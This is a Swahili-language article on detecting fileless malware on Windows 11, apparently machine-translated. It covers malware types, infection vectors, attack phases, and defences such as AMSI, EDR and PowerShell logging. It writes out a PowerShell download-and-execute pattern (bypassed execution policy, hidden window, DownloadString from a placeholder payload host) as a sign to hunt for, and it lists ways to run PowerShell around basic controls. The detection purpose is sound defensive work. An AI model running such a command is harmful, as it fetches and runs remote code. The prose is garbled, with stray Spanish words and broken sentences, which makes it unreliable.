Jinsi ya kugundua programu hasidi isiyo na faili katika Windows 11

¿Jinsi ya kugundua programu hasidi isiyo na faili? Shughuli ya ushambuliaji bila faili imeongezeka sana, na kufanya mambo kuwa mabaya zaidi, Windows 11 haina kingaNjia hii inapita diski na inategemea kumbukumbu na zana halali za mfumo; ndiyo sababu programu za antivirus zenye saini zinatatizika. Ikiwa unatafuta njia ya kuaminika ya kuigundua, jibu liko katika kuchanganya telemetry, uchambuzi wa tabia, na vidhibiti vya Windows.

Katika mfumo wa ikolojia wa sasa, kampeni zinazotumia vibaya PowerShell, WMI, au Mshta zinaambatana na mbinu za kisasa zaidi kama vile sindano za kumbukumbu, kuendelea "bila kugusa" diski, na hata. unyanyasaji wa firmwareJambo kuu ni kuelewa ramani ya vitisho, awamu za mashambulizi, na ni ishara gani wanaondoka hata wakati kila kitu kinatokea ndani ya RAM.

Je! ni programu hasidi isiyo na faili na kwa nini inajali katika Windows 11?

Tunapozungumza kuhusu vitisho "bila faili", tunarejelea msimbo hasidi ambao Huhitaji kuweka utekelezi mpya katika mfumo wa faili kufanya kazi. Kawaida hudungwa katika michakato inayoendesha na kutekelezwa katika RAM, kutegemea wakalimani na jozi zilizotiwa saini na Microsoft (k.m., PowerShell, WMI, rundll32, mshtaHii inapunguza alama yako ya miguu na hukuruhusu kukwepa injini zinazotafuta faili za kutiliwa shaka pekee.

Hata hati za ofisi au PDF ambazo hutumia udhaifu wa kuzindua amri huchukuliwa kuwa sehemu ya jambo hilo, kwa sababu. kuamsha utekelezaji katika kumbukumbu bila kuacha jozi muhimu kwa uchambuzi. Matumizi mabaya ya macros na DDE Ofisini, kwa kuwa nambari inaendesha michakato halali kama WinWord.

Wavamizi huchanganya uhandisi wa kijamii (hadaa, viungo vya barua taka) na mitego ya kiufundi: kubofya kwa mtumiaji huanzisha msururu ambapo hati hupakua na kutekeleza upakiaji wa mwisho kwenye kumbukumbu, kuepuka kuacha alama kwenye diski. Malengo hayo ni kuanzia wizi wa data hadi utekelezaji wa programu ya kukomboa, hadi harakati za kimya kimya.

Aina kwa alama katika mfumo: kutoka 'safi' hadi mahuluti

Ili kuepuka dhana zinazochanganya, ni vyema kutenganisha vitisho kwa kiwango cha mwingiliano wao na mfumo wa faili. Uainishaji huu unafafanua nini kinaendelea, kanuni inaishi wapi, na inaacha ishara gani?.

Andika I: hakuna shughuli ya faili

Programu hasidi isiyo na faili haiandiki chochote kwenye diski. Mfano wa kawaida ni kutumia a kuathirika kwa mtandao (kama vekta ya EternalBlue huko nyuma) kutekeleza mlango wa nyuma unaokaa kwenye kumbukumbu ya kernel (kesi kama DoublePulsar). Hapa, kila kitu kinatokea kwenye RAM na hakuna mabaki katika mfumo wa faili.

Chaguo jingine ni kuchafua programu dhibiti ya vipengele: BIOS/UEFI, adapta za mtandao, vifaa vya pembeni vya USB (mbinu za aina ya BadUSB) au hata mifumo ndogo ya CPU. Huendelea kupitia kuwasha upya na kusakinisha upya, huku kukiwa na ugumu ulioongezwa Bidhaa chache hukagua firmwareHaya ni mashambulizi magumu, chini ya mara kwa mara, lakini ni hatari kwa sababu ya siri na uimara wao.

Aina ya II: Shughuli ya uhifadhi wa kumbukumbu isiyo ya moja kwa moja

Hapa, programu hasidi "haiachi" inayoweza kutekelezwa yenyewe, lakini hutumia vyombo vinavyodhibitiwa na mfumo ambavyo kimsingi huhifadhiwa kama faili. Kwa mfano, backdoors kwamba kupanda comandos de PowerShell kwenye hazina ya WMI na uanzishe utekelezaji wake na vichungi vya tukio. Inawezekana kuisanikisha kutoka kwa safu ya amri bila kuacha jozi, lakini hazina ya WMI inakaa kwenye diski kama hifadhidata halali, na kuifanya iwe ngumu kusafisha bila kuathiri mfumo.

Kwa mtazamo wa vitendo wanachukuliwa kuwa hawana faili, kwa sababu chombo hicho (WMI, Registry, nk) Sio toleo la kawaida linaloweza kutekelezwa Na usafishaji wake sio jambo dogo. Matokeo: uvumilivu wa siri na ufuatiliaji mdogo wa "jadi".

Aina ya III: Inahitaji faili kufanya kazi

Baadhi ya kesi kudumisha a kuendelea 'bila faili' Kwa kiwango cha kimantiki, wanahitaji kichochezi cha msingi wa faili. Mfano wa kawaida ni Kovter: inasajili kitenzi cha ganda kwa upanuzi wa nasibu; faili iliyo na ugani huo inapofunguliwa, hati ndogo inayotumia mshta.exe inazinduliwa, ambayo inajenga upya kamba mbaya kutoka kwa Usajili.

Ujanja ni kwamba faili hizi za "chambo" zilizo na viendelezi bila mpangilio hazina mzigo unaoweza kuchanganuliwa, na idadi kubwa ya nambari hukaa kwenye Registro (chombo kingine). Ndio maana zimeainishwa kama zisizo na athari, ingawa kwa kusema kweli zinategemea mabaki ya diski moja au zaidi kama kichochezi.

Vekta na 'wenyeji' wa maambukizi: inapoingia na inajificha wapi

Ili kuboresha utambuzi, ni muhimu kuweka ramani mahali pa kuingia na mwenyeji wa maambukizi. Mtazamo huu husaidia kubuni vidhibiti maalum Tanguliza telemetry inayofaa.

Exploits

• Kulingana na faili (Aina ya III): Hati, vitekelezo, faili za Flash/Java zilizopitwa na wakati, au faili za LNK zinaweza kutumia kivinjari au injini inayozichakata ili kupakia shellcode kwenye kumbukumbu. Vekta ya kwanza ni faili, lakini mzigo wa malipo husafiri hadi RAM.
• Kwa msingi wa mtandao (Aina ya I): Kifurushi kinachotumia uwezekano wa kuathiriwa (k.m., katika SMB) hufanikisha utekelezaji katika nchi ya watumiaji au kernel. WannaCry ilieneza mbinu hii. Mzigo wa kumbukumbu ya moja kwa moja bila faili mpya.

Vifaa

• Vifaa (Aina ya I): Diski au kadi ya mtandao firmware inaweza kubadilishwa na kanuni kuletwa. Ni ngumu kukagua na kuendelea nje ya Mfumo wa Uendeshaji.
• CPU na mifumo ndogo ya usimamizi (Aina ya I): Teknolojia kama vile ME/AMT ya Intel imeonyesha njia za kufikia Mtandao na utekelezaji nje ya OSInashambulia kwa kiwango cha chini sana, na uwezo wa juu wa siri.
• USB (Aina ya I): BadUSB hukuruhusu kupanga upya hifadhi ya USB ili kuiga kibodi au NIC na kuzindua amri au kuelekeza trafiki kwingine.
• BIOS/UEFI (Aina ya I): kupanga upya programu hasidi (kesi kama Mebromi) ambayo hutumika kabla ya Windows kuanza.
• Msimamizi (Aina ya I): Utekelezaji wa hypervisor ndogo chini ya OS ili kuficha uwepo wake. Mara chache, lakini tayari imezingatiwa kwa namna ya mizizi ya hypervisor.

Utekelezaji na sindano

• Kulingana na faili (Aina ya III): EXE/DLL/LNK au kazi zilizoratibiwa ambazo huzindua sindano katika michakato halali.
• Macros (Aina ya III): VBA katika Ofisi inaweza kusimbua na kutekeleza upakiaji, ikijumuisha programu kamili ya ukombozi, kwa idhini ya mtumiaji kupitia udanganyifu.
• Scripts (Aina II): PowerShell, VBScript au JScript kutoka faili, mstari wa amri, huduma, Usajili au WMIMshambulizi anaweza kuandika hati katika kipindi cha mbali bila kugusa diski.
• Rekodi ya Boot (MBR/Boot) (Aina II): Familia kama Petya hubatilisha sekta ya buti ili kuchukua udhibiti inapoanzisha. Iko nje ya mfumo wa faili, lakini inapatikana kwa OS na ufumbuzi wa kisasa ambao unaweza kurejesha.

Jinsi mashambulizi yasiyo na faili hufanya kazi: awamu na ishara

Ingawa haziachi faili zinazoweza kutekelezwa, kampeni hufuata mantiki ya awamu. Kuzielewa kunaruhusu ufuatiliaji. matukio na uhusiano kati ya michakato ambayo huacha alama.

• Ufikiaji wa awaliMashambulizi ya hadaa kwa kutumia viungo au viambatisho, tovuti zilizoathiriwa au stakabadhi zilizoibwa. Minyororo mingi huanza na hati ya Ofisi inayoanzisha amri PowerShell.
• Kudumu: milango ya nyuma kupitia WMI (vichungi na usajili), Vifunguo vya utekelezaji wa Usajili au kazi zilizoratibiwa ambazo huzindua upya hati bila faili mpya hasidi.
• UchujajiMara tu maelezo yanapokusanywa, hutumwa nje ya mtandao kwa kutumia michakato inayoaminika (vivinjari, PowerShell, bitsadmin) ili kuchanganya trafiki.

Mtindo huu ni wa siri sana kwa sababu viashiria vya mashambulizi Zinajificha katika hali ya kawaida: hoja za mstari wa amri, mnyororo wa mchakato, miunganisho ya nje isiyo ya kawaida, au ufikiaji wa API za sindano.

Mbinu za kawaida: kutoka kumbukumbu hadi kurekodi

Waigizaji hutegemea anuwai ya mbinu kwamba kuongeza siri. Inasaidia kujua zile zinazojulikana zaidi ili kuwezesha utambuzi bora.

• Mkazi katika kumbukumbu: Inapakia mizigo kwenye nafasi ya mchakato unaoaminika ambao unasubiri kuwezesha. rootkits na ndoano Katika kernel, wao huinua kiwango cha kujificha.
• Kudumu katika UsajiliHifadhi matone yaliyosimbwa kwa njia fiche katika vitufe na uirejeshe maji kutoka kwa kizindua halali (mshta, rundll32, wscript). Kisakinishi cha muda mfupi kinaweza kujiharibu ili kupunguza alama yake.
• Ulaghai wa kitambulishoKwa kutumia majina ya mtumiaji na nywila zilizoibiwa, mshambuliaji hutekeleza makombora na mimea ya mbali ufikiaji wa kimya katika Usajili au WMI.
• 'Fileless' RansomwareUsimbaji fiche na mawasiliano ya C2 hupangwa kutoka kwa RAM, na hivyo kupunguza fursa za kutambuliwa hadi uharibifu uonekane.
• Seti za uendeshaji: misururu ya kiotomatiki ambayo hutambua udhaifu na kupeleka mizigo ya kumbukumbu pekee baada ya mtumiaji kubofya.
• Nyaraka zilizo na msimbo: macros na taratibu kama DDE zinazoanzisha amri bila kuhifadhi utekelezo kwenye diski.

Tafiti za tasnia tayari zimeonyesha kilele mashuhuri: katika kipindi kimoja cha 2018, a ongezeko la zaidi ya 90% katika msingi wa hati na mashambulizi ya mnyororo wa PowerShell, ishara kwamba vekta inapendekezwa kwa ufanisi wake.

Changamoto kwa makampuni na wauzaji: kwa nini kuzuia haitoshi

Itakuwa ya kujaribu kuzima PowerShell au kupiga marufuku macros milele, lakini Ungevunja operesheniPowerShell ni nguzo ya utawala wa kisasa na Ofisi ni muhimu katika biashara; kuzuia kwa upofu mara nyingi haiwezekani.

Kwa kuongezea, kuna njia za kupitisha udhibiti wa kimsingi: kuendesha PowerShell kupitia DLL na rundll32, hati za ufungashaji kwenye EXEs, Lete nakala yako mwenyewe ya PowerShell au hata kuficha maandishi kwenye picha na kuyatoa kwenye kumbukumbu. Kwa hiyo, utetezi hauwezi kutegemea tu juu ya kukataa kuwepo kwa zana.

Kosa lingine la kawaida ni kukabidhi uamuzi mzima kwa wingu: ikiwa wakala atalazimika kusubiri jibu kutoka kwa seva, Unapoteza kuzuia kwa wakati halisiData ya telemetry inaweza kupakiwa ili kuboresha habari, lakini Kupunguza lazima kutokea katika hatua ya mwisho.

Jinsi ya kugundua programu hasidi isiyo na faili katika Windows 11: telemetry na tabia

Mkakati wa kushinda ni kufuatilia michakato na kumbukumbuSio faili. Tabia mbaya ni thabiti zaidi kuliko fomu ambazo faili huchukua, na kuzifanya kuwa bora kwa injini za kuzuia.

• AMSI (Kiolesura cha Kuchanganua Antimalware)Inaingilia hati za PowerShell, VBScript, au JScript hata wakati zimeundwa kwa kumbukumbu. Ni bora kwa kunasa mifuatano iliyofichwa kabla ya utekelezaji.
• Ufuatiliaji wa mchakato: anza/malizia, PID, wazazi na watoto, njia, mistari ya amri na heshi, pamoja na miti ya utekelezaji ili kuelewa hadithi kamili.
• Uchambuzi wa kumbukumbu: kugundua sindano, mizigo ya kutafakari au PE bila kugusa diski, na mapitio ya mikoa isiyo ya kawaida ya kutekelezwa.
• Ulinzi wa sekta ya Starter: udhibiti na urejeshaji wa MBR/EFI katika kesi ya kuchezea.

Katika mfumo wa ikolojia wa Microsoft, Defender for Endpoint inachanganya AMSI, ufuatiliaji wa tabiaUchanganuzi wa kumbukumbu na ujifunzaji wa mashine kulingana na wingu hutumiwa kuongeza ugunduzi dhidi ya vibadala vipya au vilivyofichwa. Wachuuzi wengine hutumia mbinu sawa na injini zinazokaa kwenye kernel.

Mfano halisi wa uunganisho: kutoka hati hadi PowerShell

Hebu fikiria msururu ambapo Outlook inapakua kiambatisho, Word inafungua hati, maudhui amilifu yamewashwa, na PowerShell inazinduliwa na vigezo vya kutiliwa shaka. Telemetry sahihi ingeonyesha línea de comandos (k.m., ExecutionPolicy Bypass, dirisha lililofichwa), kuunganisha kwenye kikoa kisichoaminika na kuunda mchakato wa mtoto unaojisakinisha kwenye AppData.

Wakala aliye na muktadha wa ndani anaweza kuacha na kinyume shughuli mbaya bila uingiliaji wa kibinafsi, pamoja na kuarifu SIEM au kupitia barua pepe/SMS. Baadhi ya bidhaa huongeza safu ya chanzo cha chanzo (mifano ya aina ya StoryLine), ambayo haiashirii mchakato unaoonekana (Outlook/Word), bali kwa uzi kamili wenye nia mbaya na asili yake ya kusafisha mfumo kikamilifu.

Mchoro wa amri wa kawaida wa kutazama unaweza kuonekana kama hii: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Mantiki sio kamba halisi, lakini seti ya ishara: kukwepa kwa sera, dirisha lililofichwa, upakuaji wazi, na utekelezaji wa kumbukumbu.

AMSI, bomba na jukumu la kila muigizaji: kutoka mwisho hadi SOC

Zaidi ya kunasa hati, usanifu dhabiti hupanga hatua zinazowezesha uchunguzi na majibu. Ushahidi zaidi kabla ya kutekeleza mzigo, ni bora zaidi., mejor.

• Ukatizaji wa hatiAMSI hutoa maudhui (hata kama yanatolewa kwa haraka) kwa uchanganuzi tuli na unaobadilika katika mfumo wa programu hasidi.
• Mchakato wa matukioPID, jozi, heshi, njia na data zingine hukusanywa. argumentos, kuanzisha miti ya mchakato ambayo imesababisha mzigo wa mwisho.
• Utambuzi na kuripotiUgunduzi huonyeshwa kwenye dashibodi ya bidhaa na kutumwa kwa majukwaa ya mtandao (NDR) kwa taswira ya kampeni.
• Dhamana za mtumiajiHata kama hati imeingizwa kwenye kumbukumbu, mfumo AMSI inaikatiza katika matoleo yanayolingana ya Windows.
• Uwezo wa msimamizi: usanidi wa sera ili kuwezesha ukaguzi wa hati, kuzuia kulingana na tabia na kuunda ripoti kutoka kwa koni.
• Kazi ya SOC: uchimbaji wa mabaki (VM UUID, toleo la OS, aina ya hati, mchakato wa kuanzisha na mzazi wake, heshi na mistari ya amri) kuunda upya historia na sheria za kuinua futuras.

Wakati jukwaa inaruhusu kusafirisha nje bafa ya kumbukumbu Kwa kuhusishwa na utekelezaji, watafiti wanaweza kuzalisha ugunduzi mpya na kuimarisha ulinzi dhidi ya vibadala sawa.

Hatua za vitendo katika Windows 11: kuzuia na uwindaji

Mbali na kuwa na EDR na ukaguzi wa kumbukumbu na AMSI, Windows 11 inakuwezesha kufunga nafasi za mashambulizi na kuboresha mwonekano na vidhibiti asili.

• Usajili na vikwazo katika PowerShellHuwasha Uwekaji Magogo ya Kizuizi cha Hati na Uwekaji wa Moduli, hutumika njia zilizowekewa vikwazo inapowezekana, na kudhibiti matumizi ya Bypass/Imefichwa.
• Sheria za Kupunguza Uso wa Mashambulizi (ASR).: huzuia kuzinduliwa kwa hati na michakato ya Ofisi na matumizi mabaya ya WMI/PSExec wakati haihitajiki.
• Sera za jumla za ofisi: inalemaza kwa chaguo-msingi, utiaji saini wa ndani wa jumla na orodha kali za uaminifu; hufuatilia mtiririko wa DDE uliorithiwa.
• Ukaguzi wa WMI na Usajili: hufuatilia usajili wa tukio na funguo za utekelezaji otomatiki (Run, RunOnce, Winlogon), pamoja na kuunda kazi imepangwa.
• Ulinzi wa kuanza: inawasha Secure Boot, hukagua uadilifu wa MBR/EFI na kuthibitisha kuwa hakuna marekebisho wakati wa kuanza.
• Kuweka viraka na ugumu: hufunga udhaifu unaoweza kutekelezwa katika vivinjari, vipengele vya Ofisi na huduma za mtandao.
• Ufahamu: hufunza watumiaji na timu za kiufundi katika hadaa na mawimbi ya utekelezaji wa siri.

Kwa uwindaji, zingatia maswali kuhusu: kuunda michakato na Ofisi kuelekea PowerShell/MSHTA, hoja na downloadstring/downloadfileHati zilizo na ufifishaji wazi, sindano za kuakisi, na mitandao ya nje kwa TLDs zinazotiliwa shaka. Rejelea mawimbi haya yenye sifa na marudio ili kupunguza kelele.

Je, kila injini inaweza kugundua nini leo?

Suluhu za biashara za Microsoft huchanganya AMSI, uchanganuzi wa tabia, kuchunguza kumbukumbu na ulinzi wa sekta ya boot, pamoja na miundo ya ML inayotokana na wingu ili kuongeza dhidi ya vitisho vinavyojitokeza. Wachuuzi wengine hutekeleza ufuatiliaji wa kiwango cha kernel ili kutofautisha hasidi kutoka kwa programu mbaya na urejeshaji wa mabadiliko kiotomatiki.

Mbinu kulingana na hadithi za utekelezaji Inakuruhusu kutambua chanzo kikuu (kwa mfano, kiambatisho cha Outlook ambacho huanzisha mlolongo) na kupunguza mti mzima: hati, funguo, kazi, na jozi za kati, kuzuia kukwama kwenye dalili inayoonekana.

Makosa ya kawaida na jinsi ya kuyaepuka

Kuzuia PowerShell bila mpango mbadala wa usimamizi sio tu haiwezekani, lakini pia kuna njia za kuitisha kwa njia isiyo ya moja kwa mojaVile vile hutumika kwa macros: ama unazisimamia na sera na saini, au biashara itateseka. Ni bora kuzingatia telemetry na sheria za tabia.

Kosa lingine la kawaida ni kuamini kuwa programu zilizoidhinishwa hutatua kila kitu: teknolojia isiyo na faili inategemea hii. programu zinazoaminikaUdhibiti unapaswa kuangalia kile wanachofanya na jinsi wanavyohusiana, sio tu kama wanaruhusiwa.

Pamoja na yote yaliyo hapo juu, programu hasidi isiyo na faili hukoma kuwa "mzimu" unapofuatilia kile ambacho ni muhimu sana: tabia, kumbukumbu na asili ya kila utekelezaji. Kuchanganya AMSI, telemetry ya mchakato tajiri, vidhibiti asili vya Windows 11, na safu ya EDR na uchanganuzi wa tabia hukupa faida. Ongeza kwenye sera za uhalisia za equation za macros na PowerShell, ukaguzi wa WMI/Registry, na uwindaji unaotanguliza mstari wa amri na kuchakata miti, na una ulinzi unaokata minyororo hii kabla ya kutoa sauti.